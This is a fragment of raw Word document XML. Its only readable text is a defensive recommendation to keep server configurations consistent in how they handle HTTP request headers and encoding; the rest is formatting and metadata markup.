          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Standardize Server Configuration:</w:t>
      </w:r>
      <w:r w:rsidRPr="007B57E4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ensure that server configurations are consistent across the application infrastructure. This uniformity, especially in handling HTTP request headers and encoding, will decrease the chance of misinterpretations that can lead to vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0027128C" w:rsidRPr="007B57E4" w:rsidSect="00DC1F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3BE4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A0208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F37223"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="410AA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2151814">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1099715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81"/>
    <w:rsid w:val="000141D4"/>
    <w:rsid w:val="000C7F21"/>
    <w:rsid w:val="000E1F7D"/>
    <w:rsid w:val="00136E28"/>
    <w:rsid w:val="00184A3E"/>
    <w:rsid w:val="001A76A7"/>
    <w:rsid w:val="001C116F"/>
    <w:rsid w:val="0022477F"/>
    <w:rsid w:val="0027128C"/>
    <w:rsid w:val="00320924"/>
    <w:rsid w:val="00355D0A"/>
    <w:rsid w:val="0038190F"/>
    <w:rsid w:val="00412AC9"/>
    <w:rsid w:val="00434981"/>
    <w:rsid w:val="00684634"/>
    <w:rsid w:val="007B0901"/>
    <w:rsid w:val="007B57E4"/>
    <w:rsid w:val="007F4EF6"/>
    <w:rsid w:val="009861D0"/>
    <w:rsid w:val="00A10746"/>
    <w:rsid w:val="00C15196"/>
    <w:rsid w:val="00D9364E"/>
    <w:rsid w:val="00DB03A9"/>
    <w:rsid w:val="00DC1F12"/>
    <w:rsid w:val="00DC5264"/>
    <w:rsid w:val="00EC4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4E82"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E8B08E09-ACCF-4FD8-AD77-E205D1E3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64801">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="102054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13</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-04T07:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-09T10:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>